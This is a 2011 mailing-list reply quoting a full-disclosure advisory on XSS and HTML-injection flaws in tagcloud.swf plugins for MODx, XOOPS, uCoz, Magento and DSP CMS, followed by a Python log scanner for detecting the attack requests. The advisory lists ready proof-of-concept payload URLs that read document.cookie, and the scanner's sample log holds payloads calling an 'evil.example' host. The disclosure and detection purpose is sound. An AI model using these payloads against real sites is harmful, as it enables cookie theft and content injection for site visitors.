Message-ID: <CALo60Kk1V4w_0tohP_iDvtBja0LUqcROLyM74xBriNPpfQJ6aQ@mail.gmail.com>
Date: Mon, 26 Dec 2011 17:44:32 -0500
From: Antony widmal <antony.widmal@...il.com>
To: MustLive <mustlive@...security.com.ua>
Cc: full-disclosure@...ts.grok.org.uk, submissions@...ketstormsecurity.org
Subject: Re: Vulnerabilities in plugins for MODx CMS, XOOPS, uCoz, Magento and DSP CMS
10 million XSS !
Thank you Santa.
2011/12/26 MustLive <mustlive@...security.com.ua>
> Hello list!
>
> Besides tens of millions of vulnerable web sites with affected flash files and
> multiple vulnerable plugins for different engines, which I've written about
> earlier, there are a lot of other vulnerable plugins. Here are new ones
> (some of them are vulnerable to two XSS holes). There are Cross-Site
> Scripting vulnerabilities in plugins for the engines MODx CMS, XOOPS, uCoz,
> Magento and DSP CMS, which all are ports of WP-Cumulus. A lot of other such
> plugins for other engines can be vulnerable.
>
> This XSS is similar to the XSS vulnerability in WP-Cumulus, which I've
> disclosed in 2009 (http://securityvulns.com/Wdocument842.html), because these
> plugins are using tagcloud.swf made by the author of WP-Cumulus. About such
> vulnerabilities I wrote in 2009-2011; particularly, the millions of flash
> files tagcloud.swf which are vulnerable to XSS attacks I mentioned in my
> article XSS vulnerabilities in 34 millions flash files
> (http://lists.webappsec.org/pipermail/websecurity_lists.webappsec.org/2010-January/006033.html).
>
> -------------------------
> Affected products:
> -------------------------
>
> Vulnerable are all versions of Tagcloud for MODx CMS.
>
> Vulnerable is Cumulus for XOOPS 1.0, which is also included in
> ExtendedPackRU for XOOPS.
>
> Vulnerable are all versions of uCoz-Cumulus for uCoz.
>
> Vulnerable are all versions of Cumulus Tagcloud for Magento.
>
> Vulnerable are all versions of Cumulus for DSP CMS.
>
> Some of these plugins are vulnerable to one and some to two XSS holes: the
> first hole in WP-Cumulus, which I've disclosed in 2009, and the second
> hole, which I've disclosed in 2011.
>
> Besides these ones and those which I've disclosed in 2009-2011, a lot of
> other such plugins for other engines can be vulnerable.
>
> ----------
> Details:
> ----------
>
> XSS (WASC-08):
>
> Tagcloud for MODx CMS:
>
>
> http://site/assets/files/tagcloud.swf?mode=tags&tagcloud=%3Ctags%3E%3Ca+href='javascript:alert(document.cookie)'+style='font-size:+40pt'%3EClick%20me%3C/a%3E%3C/tags%3E
>
> Cumulus for XOOPS:
>
>
> http://site/modules/cumulus/include/cumulus.swf?mode=tags&tagcloud=%3Ctags%3E%3Ca+href='javascript:alert(document.cookie)'+style='font-size:+40pt'%3EClick%20me%3C/a%3E%3C/tags%3E
>
> uCoz-Cumulus for uCoz:
>
>
> http://site/tagcloud.swf?mode=tags&tagcloud=%3Ctags%3E%3Ca+href='javascript:alert(document.cookie)'+style='font-size:+40pt'%3EClick%20me%3C/a%3E%3C/tags%3E
>
> Cumulus Tagcloud for Magento:
>
>
> http://site/frontend/tag/tagcloud.swf?mode=tags&tagcloud=%3Ctags%3E%3Ca+href=%27javascript:alert(document.cookie)%27+style=%27font-size:+40pt%27%3EClick%20me%3C/a%3E%3C/tags%3E
>
> http://site/frontend/tag/tagcloud.swf?xmlpath=xss.xml
>
> http://site/frontend/tag/tagcloud.swf?xmlpath=http://site/xss.xml
>
> Via parameters mode and xmlpath.
>
> Cumulus for DSP CMS:
>
>
> http://site/engine/tags/cumulus.swf?mode=tags&tagcloud=%3Ctags%3E%3Ca+href=%27javascript:alert(document.cookie)%27+style=%27font-size:+40pt%27%3EClick%20me%3C/a%3E%3C/tags%3E
>
> Code will execute after a click. It's strictly social XSS
> (http://websecurity.com.ua/5476/). Also it's possible to conduct (like in
> WP-Cumulus) an HTML Injection attack.
>
> -------------------------------------------------
> Plugins with fixed version of swf-file:
> -------------------------------------------------
>
> Because in November 2009, after my informing, Roy Tanck (developer of
> WP-Cumulus) fixed only the XSS vector, but not the HTML Injection vector,
> it's still possible to conduct HTML Injection attacks (for injecting
> arbitrary links) against all versions of this swf-file (which can be found
> under the name tagcloud.swf and other names), including the fixed version
> of the swf-file with the fixed XSS hole.
>
> So all those plugins whose developers fixed this vulnerability (after my
> informing or by informing from Roy or other people) by updating the swf-file
> are still vulnerable to HTML Injection. These five plugins are using the
> non-fixed version of the swf-file.
>
> I mentioned these vulnerabilities at my site:
> http://websecurity.com.ua/5601/
>
> Best wishes & regards,
> MustLive
> Administrator of Websecurity web site
> http://websecurity.com.ua
>
>
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
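As an added defender-side example (not part of the advisory, nor of any of the plugins' code), the following Python scanner applies the request patterns from the advisory to a few constructed access-log lines: it flags script-scheme hrefs in the inline `tagcloud` XML (the XSS vector), off-site hrefs in that XML (the HTML-injection vector the post says survived the 2009 fix), and `xmlpath` values that point at a remote XML source. The site host name `site`, the minimal `METHOD target status` log format and the log contents are assumptions.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample log lines (not from the advisory): "METHOD target status".
SAMPLE_LOG = """\
GET /assets/files/tagcloud.swf?mode=tags&tagcloud=%3Ctags%3E%3Ca+href='javascript:alert(1)'%3Eclick%3C/a%3E%3C/tags%3E 200
GET /modules/cumulus/include/cumulus.swf?mode=tags&tagcloud=%3Ctags%3E%3Ca+href='http://evil.example/'%3Eclick%3C/a%3E%3C/tags%3E 200
GET /frontend/tag/tagcloud.swf?xmlpath=http://evil.example/xss.xml 200
GET /frontend/tag/tagcloud.swf?xmlpath=tags.xml 200
GET /assets/files/tagcloud.swf 200
GET /index.php?id=1 200
"""

SWF_NAMES = ("tagcloud.swf", "cumulus.swf")          # file names used by the ports
HREF_RE = re.compile(r"""href\s*=\s*['"]?\s*([^'"\s>]+)""", re.I)
SCRIPT_SCHEMES = ("javascript:", "vbscript:", "data:")
REMOTE_PREFIXES = ("http://", "https://", "//")

def classify_request(request_target: str, own_host: str = "site") -> list[str]:
    """Return findings for one request target (path + query) aimed at the tag-cloud swf."""
    parts = urlsplit(request_target)
    if not parts.path.lower().endswith(SWF_NAMES):
        return []
    params = parse_qs(parts.query, keep_blank_values=True)  # percent-decodes once, like the swf
    findings = []
    for xml in params.get("tagcloud", []):          # inline XML passed via the tagcloud parameter
        for href in HREF_RE.findall(xml):
            href_l = href.strip().lower()
            if href_l.startswith(SCRIPT_SCHEMES):
                findings.append("xss: script-scheme href in tagcloud XML")
            elif href_l.startswith(REMOTE_PREFIXES):
                absolute = "http:" + href_l if href_l.startswith("//") else href_l
                if urlsplit(absolute).hostname != own_host:
                    findings.append("html-injection: off-site href in tagcloud XML")
    for path in params.get("xmlpath", []):          # external tag list passed via xmlpath
        if path.strip().lower().startswith(REMOTE_PREFIXES):
            findings.append("xmlpath: remote XML source")
    return findings

def scan_log(log_text: str) -> list[tuple[str, list[str]]]:
    """Scan 'METHOD target status' lines; return (target, findings) for every hit."""
    hits = []
    for line in log_text.splitlines():
        fields = line.split()
        if len(fields) < 2:
            continue
        findings = classify_request(fields[1])
        if findings:
            hits.append((fields[1], findings))
    return hits
```

A local `xmlpath` such as `tags.xml` is not flagged here; compare it against the file the deployment actually ships before treating it as benign.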